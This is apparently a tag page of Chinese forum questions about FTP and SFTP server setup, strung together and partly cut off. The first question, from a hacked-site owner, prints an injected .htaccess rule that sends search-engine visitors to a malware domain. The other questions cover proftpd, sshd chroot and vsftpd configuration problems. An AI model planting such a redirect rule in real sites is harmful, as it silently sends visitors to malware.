标签: ftp

我的网站被黑了，此时，我知道一些细节，但我不知道它究竟是如何发生的，也不知道如何在未来防止它发生。我需要你的帮助来剖析这次攻击，以便我可以防止它再次发生。这有点长，但我想确保我提供了足够的信息来帮助解决问题。

这就是发生的事情。

几周前，我收到了来自托管公司 GoDaddy 的电子邮件，说我的网站使用了太多资源，他们预计 MySQL 查询是罪魁祸首。有问题的查询是一个搜索查询，其中包含 5-6 个术语。根据我的设置方式，您搜索的术语越多，查询就越复杂。没问题。我修复了它，但与此同时，GoDaddy 也暂时关闭了我的帐户，大约 3 天后一切才恢复正常。

在那次事件之后，我的搜索引擎流量急剧下降，大约 90%。它很糟糕，因为我什么都没想到，将其写入查询失败并认为它会在 Google 重新抓取该网站时及时返回。它没有。

几天前，我收到一封来自用户的电子邮件，说我的网站托管了恶意软件。我直接在浏览器中加载了该站点，但没有看到任何注入到页面中的内容。然后我检查了我的 .htaccess 文件，发现以下内容：

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=584 [R,L]
</IfModule>

可爱的。而且有点狡猾。从地址栏或书签直接导航到站点，我通常会像往常一样加载站点。我很少通过搜索引擎的链接访问我的网站，所以这就是为什么只要有黑客攻击就没有被发现的原因。该恶意软件也没有直接托管在我的网站上。

快速搜索显示其他人也遇到了同样的问题，但我怀疑还有很多人还没有发现它。大多数建议是升级到最新版本的软件、更改密码等。

由于我使用的是我自己的自定义内容管理系统而不是无处不在的 Wordpress，因此我进行了更深入的挖掘。我扫描了所有文件以查找 PHP 漏洞利用中使用的常用函数：base64_decode、exec、shell 等……没有发现任何可疑的东西，也没有额外的文件。

我接下来检查了 GoDaddy 的文件管理器历史记录，发现 .htaccess 文件在我的搜索查询被指控使用过多服务器资源的同一日期更改。这可能是一个不幸的巧合，但我并不完全确定。.htaccess 文件中的重定向似乎不是资源密集型的，而且查询足够复杂，可能是资源密集型的。

我想确定我的代码不是问题，所以我在修改 …

当我尝试创建新目录时，我突然收到错误 550：Filezilla 中的权限被拒绝。

几天前，我更改了服务器上有关 ssl 和 imap 设置的一些设置，但我认为这不会影响 FTP 设置...

无论如何，经过长时间的谷歌搜索似乎没有任何效果。主要想法可能是用户没有获得权限，但有趣的是我可以：

• 创建文件
• 删除文件
• 删除目录

但不创建目录。我在主目录中收到错误“550 Permission denied”，在子目录中收到“550 access_log: No such file or directory”。

任何人都知道错误可能在哪里？谢谢

我似乎找不到停止/重新启动 proftpd 的方法。我的服务器 IP 地址是 xx.yy.zz.ww 并且通过 FTP 从外部设备连接给我提示：

Connected to xx.yy.zz.ww
220 ProFTPD 1.3.1 Server (ProFTPD)

然后它问我用户名。

当我尝试从同一台服务器（ftp localhost）连接时，会发生同样的事情。因此，我确定 proftp 正在我的服务器上运行。

另外，在我的服务器 (xx.yy.zz.ww) 上。我在拖尾/var/log/messages，它显示我打开和关闭了 FTP 会话。

我找不到 proftpd 是如何工作的。/etc/init.d/ 没有 proftpd ；/etc/xinetd.d/ 没有 proftpd。

我看了看：/etc/proftpd.conf它显示了我ServerType inetd

另外，当我运行时：ps -auxfww| grep proftp 我什么也没得到（除了我当前的命令）

我怎样才能知道 proftp 正在运行，我怎样才能杀死它/重新启动它？

我正在尝试在 EC2 上的 ubuntu/precise 上设置 sftp 服务器。我已经成功添加了一个可以通过 ssh 连接的新用户，但是一旦我添加了以下子句：

Match Group sftp
    ChrootDirectory /home/%u
    AllowTCPForwarding no
    X11Forwarding no
    ForceCommand internal-sftp

我无法再连接（根本无法连接，无论是 ssh 还是其他方式），我收到消息

Error: Connection refused
Error: Could not connect to server

我能够连接子系统设置为：

#Subsystem sftp /usr/lib/openssh/sftp-server
Subsystem sftp internal-sftp

知道为什么 ssh 服务器会因这个“匹配”子句而失败吗？基本上，除了“chroot”部分之外，一切都在工作。

我正在尝试在运行 Ubuntu 12.04 的服务器上使用虚拟用户设置 VSFTPD。我已将服务器配置为允许虚拟用户登录，但无法让它允许上传。我的 vsftpd.conf 如下：

listen=YES
anonymous_enable=NO
local_enable=YES
write_enable=YES
local_umask=022
anon_upload_enable=YES
dirmessage_enable=YES
use_localtime=YES
xferlog_enable=YES
connect_from_port_20=YES

chroot_local_user=YES
virtual_use_local_privs=YES
guest_enable=YES
guest_username=virtual
user_sub_token=$USER
local_root=/var/www/$USER
hide_ids=YES

secure_chroot_dir=/var/run/vsftpd/empty
pam_service_name=vsftpd
rsa_cert_file=/etc/ssl/private/vsftpd.pem

/etc/pam.d/vsftpd 包含：

auth required pam_pwdfile.so pwdfile /etc/vsftpd.passwd crypt=hash
account required pam_permit.so crypt=hash

我设置了两个虚拟用户，其中一个与本地用户同名。他们每个人在 /var/www/ 中都有一个由“虚拟”拥有的目录。据我了解，当虚拟用户以这种方式登录时，他们将在系统中显示为虚拟用户。使用此配置用户可以登录，但不能上传文件。中给出的错误/var/log/vsftpd.log是：

Tue Nov 20 19:49:00 2012 [pid 2] CONNECT: Client "96.233.116.53"
Tue Nov 20 19:49:07 2012 [pid 1] [zac] OK LOGIN: Client "96.233.116.53"
Tue Nov 20 19:49:11 2012 [pid 2] CONNECT: Client "96.233.116.53"
Tue Nov 20 19:49:11 …

是否可以将 vsftpd 设置为仅接受来自特定 IP 地址集的连接？

我已经查看了 /etc/vsftpd.conf 的选项，但没有任何提示。说明书也没有。

我的服务器操作系统：红帽企业 Linux 服务器 6.5 版（圣地亚哥）